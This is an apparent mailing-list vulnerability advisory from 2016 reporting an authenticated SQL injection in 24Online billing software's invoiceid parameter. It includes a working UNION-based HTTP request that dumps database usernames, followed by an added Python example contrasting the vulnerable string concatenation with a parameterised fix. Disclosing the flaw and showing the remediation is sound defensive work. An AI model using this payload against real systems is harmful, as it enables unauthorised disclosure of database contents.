Message-Id: <201607031017.u63AHTHM007349@sf01web3.securityfocus.com>
Date: Sun, 3 Jul 2016 10:17:29 GMT
From: rahullraz@...il.com
To: bugtraq@...urityfocus.com
Subject: [FD]CVE ID request : SQL injection in 24Online Client
Software name: 24 online
Version: 8.3.6 build 9.0
Vendor website: http://24onlinebilling.com
Potentially other versions older than this are vulnerable too.
Vulnerability type: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The invoiceid GET parameter on <base url>/24online/webpages/myaccount/usersessionsummary.jsp is not filtered properly and leads to SQL injection.
Authentication Required: Yes
A non-privileged authenticated user can inject SQL commands via <base-url>/24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=<numeric-id>&fromdt=dd/mm/yyyy hh:mm:ss&todt=dd/mm/yyyy hh:mm:ss
This results in complete disclosure of the contents of the stored database.
-----------------------------------
GET /24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=93043+UNION+ALL+SELECT+null,null,null,null,usename,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pg_user--+-&fromdt=06/05/2016%2019:37:44&todt=03/07/2016%2015:21:16 HTTP/1.1
Host: 10.100.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=5464B4DD2B003E1E73E34FF773CA7232; myaccountmenu_id=menu_5
Connection: keep-alive

HTTP/1.1 200 OK
Date: Sun, 03 Jul 2016 09:59:41 GMT
Server: Apache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1
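An added example, not taken from the advisory or from the vendor's code: the defect pattern behind this report and its fix, shown in Python against an in-memory SQLite database that stands in for the product's PostgreSQL backend (the request above reads pg_user, so the backend is PostgreSQL; the table and column names here are constructed). session_summary_vulnerable splices the invoiceid parameter into the query text, which is what the JSP page evidently does; session_summary_fixed checks that the parameter is numeric and then binds it as a query parameter, so its value can never alter the statement's structure. In the product's Java/JSP stack the equivalent fix is a JDBC PreparedStatement with setInt instead of string concatenation.

```python
import sqlite3

# Constructed in-memory stand-in for the billing database. The real product
# runs on PostgreSQL, but the concatenation mistake and its fix are identical
# on any backend.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE session_summary (
            invoiceid INTEGER, username TEXT, started TEXT, bytes_used INTEGER
        );
        CREATE TABLE app_users (usename TEXT, passwd TEXT);
        INSERT INTO session_summary VALUES (93043, 'alice', '2016-07-03 09:00:00', 4096);
        INSERT INTO session_summary VALUES (93044, 'bob',   '2016-07-03 09:10:00', 8192);
        INSERT INTO app_users VALUES ('postgres', 'hash-1');
        INSERT INTO app_users VALUES ('billing',  'hash-2');
        """
    )
    return conn


def session_summary_vulnerable(conn: sqlite3.Connection, invoiceid: str) -> list:
    # Mirrors the defect in the advisory: the raw GET parameter becomes part of
    # the SQL text, so a UNION in the parameter reads any table the DB user can see.
    sql = (
        "SELECT invoiceid, username, started, bytes_used FROM session_summary "
        "WHERE invoiceid = " + invoiceid
    )
    return conn.execute(sql).fetchall()


def session_summary_fixed(conn: sqlite3.Connection, invoiceid: str) -> list:
    # 1. Enforce the documented type: invoiceid is a numeric id, nothing else.
    if not invoiceid.isdigit():
        raise ValueError("invoiceid must be a non-negative integer")
    # 2. Bind the value as a parameter. The driver sends it as data, not as
    #    statement text, so the query structure is fixed at compile time.
    sql = (
        "SELECT invoiceid, username, started, bytes_used FROM session_summary "
        "WHERE invoiceid = ?"
    )
    return conn.execute(sql, (int(invoiceid),)).fetchall()


def rejects_non_numeric(conn: sqlite3.Connection, invoiceid: str) -> bool:
    # True when the hardened handler refuses the input outright.
    try:
        session_summary_fixed(conn, invoiceid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("legitimate lookup:", session_summary_fixed(db, "93043"))
    # A constructed, non-numeric parameter value of the kind the advisory
    # describes is refused before any SQL is built.
    print("rejected:", rejects_non_numeric(db, "93043 UNION ALL SELECT 1,2,3,4"))
```

The type check alone would already stop the request in the advisory, but it is not the defence to rely on: a string-typed parameter would pass it unchanged, so the parameter binding is what actually closes the hole, and the validation is a cheap first gate that also produces a clear log line when a non-numeric invoiceid arrives.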